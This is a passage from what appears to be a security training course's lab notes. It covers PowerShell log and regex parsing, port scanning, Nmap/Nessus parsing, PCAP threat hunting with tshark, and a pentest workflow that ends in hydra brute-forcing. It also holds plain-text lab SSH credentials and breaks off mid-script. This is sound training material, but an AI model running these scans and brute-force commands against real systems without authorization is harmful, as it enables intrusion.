2170(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
2171
2172Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV")}
2173---------------------------------------------------------------
2174
2175
2176The above command would give us all the WebDAV requests.
2177
2178To filter this to a particular user name, use the below command:
2179------------------------Type This------------------------------
2180Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV") -and ($_ | Select-String "OPTIONS")}
2181---------------------------------------------------------------
2182
2183
2184Some more options that will be more commonly required :
2185
2186For Outlook Web Access : Replace WebDAV with OWA
2187
2188For EAS : Replace WebDAV with Microsoft-server-activesync
2189
2190For ECP : Replace WebDAV with ECP
2191
2192
2193
2194
2195
2196
2197
2198####################################################################
2199# Windows PowerShell: Extracting Strings Using Regular Expressions #
2200####################################################################
2201
2202
2203Regex Characters you might run into:
2204
2205^ Start of string, or start of line in a multiline pattern
2206$ End of string, or start of line in a multiline pattern
2207\b Word boundary
2208\d Digit
2209\ Escape the following character
2210* 0 or more {3} Exactly 3
2211+ 1 or more {3,} 3 or more
2212? 0 or 1 {3,5} 3, 4 or 5
2213
2214
2215
2216To build a script that will extract data from a text file and place the extracted text into another file, we need three main elements:
2217
22181) The input file that will be parsed
2219------------------------Type This------------------------------
2220(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=rDN3CMLc", "c:\ps\emails.txt")
2221(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=XySD8Mi2", "c:\ps\ip_addresses.txt")
2222(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=v5Yq66sH", "c:\ps\URL_addresses.txt")
2223---------------------------------------------------------------
22242) The regular expression that the input file will be compared against
2225
22263) The output file for where the extracted data will be placed.
2227
2228Windows PowerShell has a "select-string" cmdlet which can be used to quickly scan a file to see if a certain string value exists.
2229Using some of the parameters of this cmdlet, we are able to search through a file to see whether any strings match a certain pattern, and then output the results to a separate file.
2230
2231To demonstrate this concept, below is a Windows PowerShell script I created to search through a text file for strings that match the Regular Expression (or RegEx for short) pattern belonging to e-mail addresses.
2232------------------------Type This------------------------------
2233$input_path = 'c:\ps\emails.txt'
2234$output_file = 'c:\ps\extracted_addresses.txt'
2235$regex = '\b[A-Za-z0-9._%-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}\b'
2236select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file
2237---------------------------------------------------------------
2238
2239
2240In this script, we have the following variables:
2241
22421) $input_path to hold the path to the input file we want to parse
2243
22442) $output_file to hold the path to the file we want the results to be stored in
2245
22463) $regex to hold the regular expression pattern to be used when the strings are being matched.
2247
2248The select-string cmdlet contains various parameters as follows:
2249
22501) "-Path" which takes as input the full path to the input file
2251
22522) "-Pattern" which takes as input the regular expression used in the matching process
2253
22543) "-AllMatches" which searches for more than one match (without this parameter it would stop after the first match is found) and is piped to "$.Matches" and then "$_.Value" which represent using the current values of all the matches.
2255
2256Using ">" the results are written to the destination specified in the $output_file variable.
2257
2258Here are two further examples of this script which incorporate a regular expression for extracting IP addresses and URLs.
2259
2260IP addresses
2261------------
2262For the purposes of this example, I ran the tracert command to trace the route from my host to google.com and saved the results into a file called ip_addresses.txt. You may choose to use this script for extracting IP addresses from router logs, firewall logs, debug logs, etc.
2263------------------------Type This------------------------------
2264$input_path = 'c:\ps\ip_addresses.txt'
2265$output_file = 'c:\ps\extracted_ip_addresses.txt'
2266$regex = '\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b'
2267select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file
2268---------------------------------------------------------------
2269
2270
2271
2272URLs
2273----
2274For the purposes of this example, I created a couple of dummy web server log entries and saved them into URL_addresses.txt.
2275You may choose to use this script for extracting URL addresses from proxy logs, network packet capture logs, debug logs, etc.
2276------------------------Type This------------------------------
2277$input_path = 'c:\ps\URL_addresses.txt'
2278$output_file = 'c:\ps\extracted_URL_addresses.txt'
2279$regex = '([a-zA-Z]{3,})://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
2280select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file
2281---------------------------------------------------------------
2282
2283In addition to the examples above, many other types of strings can be extracted using this script.
2284All you need to do is switch the regular expression in the "$regex" variable!
2285In fact, the beauty of such a PowerShell script is its simplicity and speed of execution.
2286
2287
2288
2289
2290
2291
2292########################################
2293# Basic Network Commands in PowerShell #
2294########################################
2295
2296Reference:
2297https://blogs.technet.microsoft.com/josebda/2015/04/18/windows-powershell-equivalents-for-common-networking-commands-ipconfig-ping-nslookup/
2298
2299
2300###################
2301# Pentester Tasks #
2302###################
2303Reference:
2304http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/02/use-powershell-for-network-host-and-port-discovery-sweeps.aspx
2305
2306
2307Listing IPs
2308-----------
2309One of the typical ways for working with IP addressed in most scripts is to work with an octet and then increase the last one
2310
2311------------------------Type This------------------------------
2312$octect = "149.28.201."
2313$lastoctect = (1..255)
2314$lastoctect | ForEach-Object {write-host "$($octect)$($_)"}
2315---------------------------------------------------------------
2316
2317
2318Ping Sweep
2319------------------------------------------------------
2320PowerShell provides several methods for doing Ping
2321Test-Connection cmdlet
2322Creation of a WMI Object
2323.Net System.Net.NetworkInformation.Ping Object
2324------------------------------------------------------
2325
2326
2327
2328Port Scans
2329----------
2330To test if a port is open on a remote host in PowerShell the best method is to use the .Net abstraction that it provides to Windows Socket library
2331For TCP the .Net System.Net.Sockets.TcpClient
2332For UDP the .Net System.Net.Sockets.UdpClient
2333
2334
2335
2336
2337TCP Scan (Windows 7)
2338--------------------
2339NOTE: If you are using Windows 7, use the code below
2340------------------------Type This------------------------------
2341$ports=22,80,443,3389
2342$target = "149.28.201.171"
2343foreach ($i in $ports) {
2344try {
2345$socket = new-object System.Net.Sockets.TCPClient($target, $i);
2346} catch {}
2347if ($socket -eq $NULL) {
2348echo "$target:$i - Closed";
2349} else {
2350echo "$target:$i - Open";
2351$socket = $NULL;
2352}}
2353---------------------------------------------------------------
2354
2355
2356
2357TCP Scan (Windows 10)
2358---------------------
2359NOTE: If you are using Windows 10, use the code below
2360
2361------------------------Type This------------------------------
2362$ports=22,80,443,3389
2363$target = "149.28.201.171"
2364foreach ($i in $ports) {
2365try {
2366$socket = new-object System.Net.Sockets.TCPClient($target, $i);
2367} catch {}
2368if ($socket -eq $NULL) {
2369echo "${target}:$i - Closed";
2370} else {
2371echo "${target}:$i - Open";
2372$socket = $NULL;
2373}}
2374---------------------------------------------------------------
2375
2376
2377
2378##########################
2379# Parsing Nmap XML Files #
2380##########################
2381If you are NOT using the Win7 VM provided then you can get the required files for this lab which are located in this zip file:
2382https://infosecaddicts-files.s3.amazonaws.com/PowerShell-Files.zip
2383
2384
2385Let's setup a directory to work in:
2386------------------------Type This------------------------------
2387cd c:\
2388
2389mkdir ps
2390
2391cd ps
2392---------------------------------------------------------------
2393
2394
2395
2396
2397------------------------Type This------------------------------
2398cd c:\ps
2399mkdir PowerShell-Files
2400cd PowerShell-Files
2401(new-object System.Net.WebClient).DownloadFile("https://infosecaddicts-files.s3.amazonaws.com/Parse-Nmap.ps1", "c:\ps\PowerShell-Files\Parse-Nmap.ps1")
2402(new-object System.Net.WebClient).DownloadFile("https://infosecaddicts-files.s3.amazonaws.com/class_nessus.csv", "c:\ps\PowerShell-Files\class_nessus.csv")
2403(new-object System.Net.WebClient).DownloadFile("https://infosecaddicts-files.s3.amazonaws.com/samplescan.xml", "c:\ps\PowerShell-Files\samplescan.xml")
2404---------------------------------------------------------------
2405
2406
2407Run Powershell as administrator
2408------------------------Type This------------------------------
2409cd C:\ps\\PowerShell-Files
2410
2411Get-ExecutionPolicy
2412Set-ExecutionPolicy Unrestricted –Force
2413---------------------------------------------------------------
2414
2415
2416Parse nmap XML
2417------------------------Type This------------------------------
2418.\parse-nmap.ps1 samplescan.xml
2419---------------------------------------------------------------
2420
2421
2422Process all XML files
2423------------------------Type This------------------------------
2424.\parse-nmap.ps1 *.xml
2425---------------------------------------------------------------
2426
2427Piping also works
2428------------------------Type This------------------------------
2429dir *.xml | .\parse-nmap.ps1
2430---------------------------------------------------------------
2431
2432Advanced parsing with filtering conditions
2433------------------------Type This------------------------------
2434.\parse-nmap.ps1 samplescan.xml | where {$_.OS -like "*Windows XP*"} | format-table IPv4,HostName,OS
2435---------------------------------------------------------------
2436
2437
2438More parsing
2439------------------------Type This------------------------------
2440.\parse-nmap.ps1 samplescan.xml | where {$_.Ports -like "*open:tcp:22*"}
2441---------------------------------------------------------------
2442
2443Parsing with match and multiple conditions
2444------------------------Type This------------------------------
2445.\parse-nmap.ps1 samplescan.xml |where {$_.Ports -match "open:tcp:80|open:tcp:443"}
2446---------------------------------------------------------------
2447
2448
2449CSV Export
2450------------------------Type This------------------------------
2451.\parse-nmap.ps1 samplescan.xml -outputdelimiter " " | where {$_.Ports -match "open:tcp:80"} | export-csv weblisteners.csv
2452---------------------------------------------------------------
2453
2454Import Data from CSV
2455------------------------Type This------------------------------
2456$data = import-csv weblisteners.csv
2457$data | where {($_.IPv4 -like "10.57.*") -and ($_.Ports -match "open:tcp:22")}
2458---------------------------------------------------------------
2459
2460
2461Export to HTML
2462------------------------Type This------------------------------
2463.\parse-nmap.ps1 samplescan.xml -outputdelimiter " " |select-object IPv4,HostName,OS | ConvertTo-Html | out-file report.html
2464---------------------------------------------------------------
2465
2466
2467########################################
2468# Parsing Nessus scans with PowerShell #
2469########################################
2470If you are NOT using the Win7 VM provided then you can get the required files for this lab which are located in this zip file:
2471https://infosecaddicts-files.s3.amazonaws.com/PowerShell-Files.zip
2472
2473
2474
2475Let's take a look at the Import-Csv cmdlet and what are the members of the object it returns:
2476------------------------Type This------------------------------
2477Import-Csv c:\ps\PowerShell-Files\class_nessus.csv | Get-Member
2478---------------------------------------------------------------
2479
2480filter the objects:
2481
2482------------------------Type This------------------------------
2483Import-Csv c:\ps\PowerShell-Files\class_nessus.csv | where {$_.risk -eq "high"}
2484---------------------------------------------------------------
2485
2486use the Select-Object cmdlet and only get unique entries:
2487------------------------Type This------------------------------
2488Import-Csv c:\ps\PowerShell-Files\class_nessus.csv | where {$_.risk -eq "high"} | select host -Unique
2489
2490Import-Csv c:\ps\PowerShell-Files\class_nessus.csv | where {"high","medium","low" -contains $_.risk} | select "Plugin ID", CVE, CVSS, Risk, Host, Protocol, Port, Name | Out-GridView
2491------------------------Type This------------------------------
2492
2493ConvertTo-Html cmdlet and turn it in to an HTML report in list format:
2494------------------------Type This------------------------------
2495Import-Csv c:\ps\PowerShell-Files\class_nessus.csv | where {"high","medium","low" -contains $_.risk} | select "Plugin ID", CVE, CVSS, Risk, Host, Protocol, Port, Name | ConvertTo-Html -As List > C:\report2.html
2496---------------------------------------------------------------
2497
2498
2499
2500
2501
2502
2503
2504
2505
2506
2507 ###################################
2508####################### Introduction to Threat Hunting ################################
2509 ###################################
2510
2511
2512
2513##################################################################
2514# Analyzing a PCAP Prads #
2515# Note: run as regular user #
2516##################################################################
2517
2518---------------------------Type this as a regular user----------------------------------
2519cd ~/yourname
2520
2521mkdir pcap_analysis/
2522
2523cd pcap_analysis/
2524
2525mkdir prads
2526
2527cd prads
2528
2529wget http://45.63.104.73/suspicious-time.pcap
2530
2531prads -r suspicious-time.pcap -l prads-asset.log
2532
2533cat prads-asset.log | less
2534
2535cat prads-asset.log | grep SYN | grep -iE 'windows|linux'
2536
2537cat prads-asset.log | grep CLIENT | grep -iE 'safari|firefox|opera|chrome'
2538
2539cat prads-asset.log | grep SERVER | grep -iE 'apache|linux|ubuntu|nginx|iis'
2540-----------------------------------------------------------------------
2541
2542
2543
2544
2545##################################
2546# PCAP Analysis with ChaosReader #
2547# Note: run as regular user #
2548##################################
2549---------------------------Type this as a regular user----------------------------------
2550cd ~/yourname
2551
2552
2553cd pcap_analysis/
2554
2555mkdir chaos_reader/
2556
2557cd chaos_reader/
2558
2559wget http://45.63.104.73/suspicious-time.pcap
2560
2561wget http://45.63.104.73/chaosreader.pl
2562
2563perl chaosreader.pl suspicious-time.pcap
2564
2565cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
2566
2567cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
2568
2569
2570for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u
2571
2572python -m SimpleHTTPServer
2573 ****** Open a web browser and browse the the IP address of your Linux machine port 8000 for the web page *****
2574
2575------------------------------------------------------------------------
2576
2577
2578
2579
2580
2581
2582
2583
2584#############################
2585# PCAP Analysis with tshark #
2586# Note: run as regular user #
2587#############################
2588---------------------------Type this as a regular user---------------------------------
2589cd ~/yourname
2590
2591mkdir pcap_analysis/
2592
2593cd pcap_analysis/
2594
2595mkdir tshark
2596
2597cd tshark
2598
2599wget http://45.63.104.73/suspicious-time.pcap
2600
2601tshark -i ens3 -r suspicious-time.pcap -qz io,phs
2602
2603tshark -r suspicious-time.pcap -qz ip_hosts,tree
2604
2605tshark -r suspicious-time.pcap -Y "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq
2606
2607tshark -r suspicious-time.pcap -Y "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
2608
2609
2610tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
2611
2612whois rapidshare.com.eyu32.ru
2613
2614whois sploitme.com.cn
2615
2616tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
2617
2618tshark -r suspicious-time.pcap -qz http_req,tree
2619
2620tshark -r suspicious-time.pcap -Y "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
2621
2622tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
2623------------------------------------------------------------------------
2624
2625
2626
2627
2628
2629
2630
2631
2632
2633
2634
2635
2636
2637
2638Here is the information to put into putty
2639
2640Host Name: 108.61.216.188
2641protocol: ssh
2642port: 22
2643username: hacklab
2644password: hacklab!cybersecurity!
2645
2646
2647
2648
2649
2650
2651
2652-----------------------------------------------------------------------------------------------------------------------------
2653-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2654-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2655--------------------------------------------------------------------------------------
2656
2657
2658
2659
2660Some tools to install:
2661---------------------------Type This-----------------------------------
2662apt install -y libcurl4-openssl-dev zlib1g-dev libssl-dev libidn11-dev libcurses-ocaml-dev libpcre3-dev libpq-dev libsvn-dev libssh-dev libmysqlclient-dev libpq-dev libsvn-dev onesixtyone snmp onesixtyone snmp nmap smbclient libnss-winbind winbind
2663-----------------------------------------------------------------------
2664
2665
2666
2667---------------------------Type This-----------------------------------
2668wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
2669gcc propecia.c -o propecia
2670sudo cp propecia /bin
2671-----------------------------------------------------------------------
2672
2673
2674
2675
2676##############################
2677# Scanning Process to follow #
2678##############################
2679
2680Step 1: Host Discovery
2681----------------------
2682
2683---------------------------Type This-----------------------------------
2684nmap -sP 172.31.2.0/24
2685
2686nmap -sL 172.31.2.0/24
2687
2688nmap -sS --open -p 22,445 172.31.2.0/24
2689
2690propecia 172.31.2 22 > file1
2691propecia 172.31.2 445 > file2
2692cat file1 file2 > file3
2693cat file3 | sort -t . -k 3,3n -k 4,4n | uniq > lab.txt
2694cat lab.txt
2695-----------------------------------------------------------------------
2696
2697
2698Step 2: Port Scan
2699-----------------
2700nmap -sS <IP-ADDRESS>
2701nmap -sU -p 69,161 <IP-ADDRESS>
2702
2703
2704---------------------------Type This-----------------------------------
2705sudo nmap -sS 172.31.2.0/24
2706sudo nmap -sU -p 69,161 172.31.2.0/24
2707-----------------------------------------------------------------------
2708
2709
2710Step 3: Bannergrab
2711------------------
2712nmap -sV <IP-ADDRESS>
2713nmap -sV -p- <IP-ADDRESS>
2714 |
2715 ----> Vulnerability Research
2716
2717---------------------------Type This-----------------------------------
2718sudo nmap -sV 172.31.2.0/24
2719-----------------------------------------------------------------------
2720
2721
2722
2723
2724Step 4: Enumerate common Windows/Linux file sharing services
2725Step 3 is where most people STOP, and you need to move on and look deeper
2726------------------------------------------------------------
2727
2728---------------------------Type This-----------------------------------
2729sudo apt install smbclient libnss-winbind winbind
2730git clone https://github.com/portcullislabs/enum4linux.git
2731cd enum4linux/
2732perl enum4linux.pl -U 172.31.2.11
2733
2734nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 172.31.2.24
2735---------------------------------------------------------------------------------------
2736
2737
2738
2739Step 5: Vulnerability Scan the webservers
2740-----------------------------------------
2741git clone https://github.com/sullo/nikto.git Nikto2
2742
2743cd Nikto2/program
2744
2745perl nikto.pl -h <IP-ADDRESS>
2746
2747
2748
2749Step 6: Directory Bruteforce every webserver
2750--------------------------------------------
2751sudo apt install -y libcurl4-openssl-dev
2752
2753git clone https://github.com/v0re/dirb.git
2754
2755cd dirb/
2756
2757./configure
2758
2759make
2760
2761./dirb
2762
2763./dirb http://<IP-ADDRESS> wordlists/big.txt
2764
2765
2766
2767
2768
2769Step 7: Analyze source code of all webpages found
2770-------------------------------------------------
2771lynx -dump "http://<IP-ADDRESS>" | grep -o "http:.*" > links
2772
2773If you ever need to download an entire Web site, perhaps for off-line viewing, wget can do the job—for example:
2774
2775$ wget \
2776 --recursive \
2777 --no-clobber \
2778 --page-requisites \
2779 --html-extension \
2780 --convert-links \
2781 --restrict-file-names=windows \
2782 --domains website.org \
2783 --no-parent \
2784 www.website.org/tutorials/html/
2785
2786
2787This command downloads the Web site www.website.org/tutorials/html/.
2788
2789The options are:
2790
2791--recursive: download the entire Web site.
2792
2793--domains website.org: don't follow links outside website.org.
2794
2795--no-parent: don't follow links outside the directory tutorials/html/.
2796
2797--page-requisites: get all the elements that compose the page (images, CSS and so on).
2798
2799--html-extension: save files with the .html extension.
2800
2801--convert-links: convert links so that they work locally, off-line.
2802
2803--restrict-file-names=windows: modify filenames so that they will work in Windows as well.
2804
2805--no-clobber: don't overwrite any existing files (used in case the download is interrupted and resumed).
2806
2807
2808
2809Step 8: Bruteforce any services you find
2810----------------------------------------
2811sudo apt install -y zlib1g-dev libssl-dev libidn11-dev libcurses-ocaml-dev libpcre3-dev libpq-dev libsvn-dev libssh-dev libmysqlclient-dev libpq-dev libsvn-dev
2812cd ~/toolz
2813git clone https://github.com/vanhauser-thc/thc-hydra.git
2814cd thc-hydra
2815./configure
2816make
2817sudo make install
2818hydra -L username.txt -P passlist.txt ftp://<IP-ADDRESS
2819hydra -l user -P passlist.txt ftp://<IP-ADDRESS
2820
2821
2822
2823##################
2824# Host Discovery #
2825##################
2826
2827Reason:
2828-------
2829You have to discover the reachable hosts in the network before you can attack them.
2830
2831
2832Hosts discovery syntax:
2833-----------------------
2834 nmap -sP 172.31.2.0/24
2835 propecia 172.31.2 22 > file1
2836 propecia 172.31.2 445 > file2
2837 cat file1 file2 > file3
2838 cat file3 | sort -t . -k 3,3n -k 4,4n | uniq > lab.txt
2839 cat lab.txt
2840
2841Issues:
2842-------
2843Issue we had to deal with was hosts that didn't respond to ICMP
2844
2845
2846 Hosts discovered:
2847 -----------------
2848 172.31.2.24
2849 172.31.2.47
2850 172.31.2.117
2851 172.31.2.181
2852 172.31.2.217
2853 172.31.2.238
2854 172.31.2.254
2855
2856
2857
2858
2859
2860
2861
2862#####################
2863# Service Discovery #
2864#####################
2865
2866Reason:
2867-------
2868Identifying what services are running on what hosts allows for you to map the network topology.
2869
2870
2871
2872Port Scan syntax:
2873 sudo nmap -sS -Pn -iL lab.txt
2874 sudo nmap -sU -p69,161 -Pn -iL lab.txt
2875
2876
2877
2878Services discovered:
2879--------------------
2880
2881joe@metasploit-box:~$ sudo nmap -sS -Pn -iL lab.txt
2882
2883Starting Nmap 7.60SVN ( https://nmap.org ) at 2018-05-05 14:52 UTC
2884Nmap scan report for 172.31.2.11
2885Host is up (0.087s latency).
2886Not shown: 995 filtered ports
2887PORT STATE SERVICE
288821/tcp open ftp
2889139/tcp open netbios-ssn
2890445/tcp open microsoft-ds
28913389/tcp open ms-wbt-server
28929999/tcp open abyss
2893
2894Nmap scan report for 172.31.2.11
2895Host is up.
2896
2897PORT STATE SERVICE
289869/udp open|filtered tftp
2899161/udp open|filtered snmp
2900
2901
2902Nmap scan report for 172.31.2.14
2903Host is up (0.087s latency).
2904Not shown: 995 filtered ports
2905PORT STATE SERVICE
290621/tcp open ftp
2907139/tcp open netbios-ssn
2908445/tcp open microsoft-ds
29093389/tcp open ms-wbt-server
29109999/tcp open abyss
2911
2912
2913Nmap scan report for 172.31.2.14
2914Host is up.
2915
2916PORT STATE SERVICE
291769/udp open|filtered tftp
2918161/udp open|filtered snmp
2919
2920
2921Nmap scan report for 172.31.2.47
2922Host is up (0.086s latency).
2923Not shown: 998 closed ports
2924PORT STATE SERVICE
292522/tcp open ssh
292680/tcp open http
2927
2928Nmap scan report for 172.31.2.64
2929Host is up (0.087s latency).
2930Not shown: 997 closed ports
2931PORT STATE SERVICE
293222/tcp open ssh
293380/tcp open http
29346667/tcp open irc
2935
2936Nmap scan report for 172.31.2.86
2937Host is up (0.086s latency).
2938Not shown: 989 closed ports
2939PORT STATE SERVICE
294022/tcp open ssh
294153/tcp open domain
294280/tcp open http
2943110/tcp open pop3
2944111/tcp open rpcbind
2945139/tcp open netbios-ssn
2946143/tcp open imap
2947445/tcp open microsoft-ds
2948993/tcp open imaps
2949995/tcp open pop3s
29508080/tcp open http-proxy
2951
2952Nmap scan report for 172.31.2.117
2953Host is up (0.087s latency).
2954Not shown: 997 closed ports
2955PORT STATE SERVICE
295622/tcp open ssh
295780/tcp open http
29582020/tcp open xinupageserver
2959
2960Nmap scan report for 172.31.2.157
2961Host is up (0.087s latency).
2962Not shown: 997 closed ports
2963PORT STATE SERVICE
296421/tcp open ftp
296522/tcp open ssh
296680/tcp open http
2967
2968Nmap scan report for 172.31.2.217
2969Host is up (0.087s latency).
2970Not shown: 997 closed ports
2971PORT STATE SERVICE
297222/tcp open ssh
297380/tcp open http
29743260/tcp open iscsi
2975
2976Nmap scan report for 172.31.2.238
2977Host is up (0.087s latency).
2978Not shown: 997 closed ports
2979PORT STATE SERVICE
298022/tcp open ssh
298180/tcp open http
29826969/tcp open acmsoda
2983
2984Nmap done: 9 IP addresses (9 hosts up) scanned in 14.82 seconds
2985
2986
2987
2988
2989
2990
2991
2992
2993
2994##############################################
2995# Service Version Discovery (Bannergrabbing) #
2996##############################################
2997Reason:
2998-------
2999Identifying what versions of services are running on what hosts allows for you to determine if the hosts are vulnerable to attack.
3000
3001
3002
3003Port Scan syntax:
3004
3005joe@metasploit-box:~$ sudo nmap -sV -Pn -iL lab.txt
3006
3007Starting Nmap 7.60SVN ( https://nmap.org ) at 2018-05-05 14:56 UTC
3008Nmap scan report for 172.31.2.11
3009Host is up (0.087s latency).
3010Not shown: 995 filtered ports
3011PORT STATE SERVICE VERSION
301221/tcp open ftp FreeFloat ftpd 1.00
3013139/tcp open netbios-ssn Microsoft Windows netbios-ssn
3014445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
30153389/tcp open ms-wbt-server Microsoft Terminal Service
30169999/tcp open abyss?
3017Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003
3018
3019Nmap scan report for 172.31.2.14
3020Host is up (0.087s latency).
3021Not shown: 995 filtered ports
3022PORT STATE SERVICE VERSION
302321/tcp open ftp FreeFloat ftpd 1.00
3024139/tcp open netbios-ssn Microsoft Windows netbios-ssn
3025445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
30263389/tcp open ms-wbt-server Microsoft Terminal Service
30279999/tcp open abyss?
3028Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003
3029
3030Nmap scan report for 172.31.2.47
3031Host is up (0.087s latency).
3032Not shown: 998 closed ports
3033PORT STATE SERVICE VERSION
303422/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
303580/tcp open http Apache httpd 2.2.22 ((Ubuntu))
3036Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
3037
3038Nmap scan report for 172.31.2.64
3039Host is up (0.087s latency).
3040Not shown: 997 closed ports
3041PORT STATE SERVICE VERSION
304222/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
304380/tcp open http Apache httpd 2.4.7 ((Ubuntu))
30446667/tcp open irc ngircd
3045Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
3046
3047Nmap scan report for 172.31.2.86
3048Host is up (0.087s latency).
3049Not shown: 989 closed ports
3050PORT STATE SERVICE VERSION
305122/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
305253/tcp open domain ISC BIND 9.9.5-3 (Ubuntu Linux)
305380/tcp open http Apache httpd 2.4.7 ((Ubuntu))
3054110/tcp open pop3 Dovecot pop3d
3055111/tcp open rpcbind 2-4 (RPC #100000)
3056139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3057143/tcp open imap Dovecot imapd (Ubuntu)
3058445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3059993/tcp open ssl/imap Dovecot imapd (Ubuntu)
3060995/tcp open ssl/pop3 Dovecot pop3d
30618080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
3062Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel, cpe:/o:campmoca;:ubuntu_linux
3063
3064Nmap scan report for 172.31.2.117
3065Host is up (0.086s latency).
3066Not shown: 997 closed ports
3067PORT STATE SERVICE VERSION
306822/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
306980/tcp open http Apache httpd 2.4.7 ((Ubuntu))
30702020/tcp open ftp vsftpd 2.0.8 or later
3071Service Info: Host: minotaur; OS: Linux; CPE: cpe:/o:linux:linux_kernel
3072
3073Nmap scan report for 172.31.2.157
3074Host is up (0.086s latency).
3075Not shown: 997 closed ports
3076PORT STATE SERVICE VERSION
307721/tcp open ftp vsftpd 2.0.8 or later
307822/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
307980/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
3080
3081Nmap scan report for 172.31.2.217
3082Host is up (0.087s latency).
3083Not shown: 997 closed ports
3084PORT STATE SERVICE VERSION
308522/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
308680/tcp open http nginx
30873260/tcp open iscsi?
3088Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
3089
3090Nmap scan report for 172.31.2.238
3091Host is up (0.087s latency).
3092Not shown: 997 closed ports
3093PORT STATE SERVICE VERSION
309422/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
309580/tcp open http nginx 1.6.2
30966969/tcp open acmsoda?
3097Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
3098
3099Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
3100Nmap done: 9 IP addresses (9 hosts up) scanned in 170.68 seconds
3101
3102
3103
3104
3105
3106
3107
3108-----------------------------------------------------------------------------------------------------------------------------
3109-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3110-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3111--------------------------------------------------------------------------------------
3112
3113#!/bin/bash
3114
3115# Script made during the CyberWar class for the students to play with, debug, and improve.
3116# Take a look at the following websites for ideas:
3117# https://github.com/commonexploits/port-scan-automation
3118# https://www.commonexploits.com/penetration-testing-scripts/
3119# https://github.com/averagesecurityguy/scripts
3120# https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
3121
3122
3123
3124# Some thoughts of things to add to this script:
3125# Shodan queries (API key)
3126# AWS scanning (need credentials)
3127# Jenkins scanning
3128# Active Directory enumeration
3129# Github scanning (API key required)
3130# Blockchain platforms
3131
3132
3133
3134
3135
3136
3137
3138#############################################
3139# Check to see if script is running as root #
3140#############################################
3141if [ "$EUID" -ne 0 ]
3142 then echo "Please run as root"
3143 exit
3144fi
3145
3146
3147####################################
3148# Check to see if gcc is installed #
3149####################################
3150file1="/usr/bin/gcc"
3151if [ -f "$file1" ]
3152then
3153 echo "$file is installed."
3154 clear
3155else
3156 echo "$file not found."
3157 echo Installing gcc
3158 apt-get install -y gcc
3159 clear
3160fi
3161
3162########################
3163# Make the directories #
3164########################
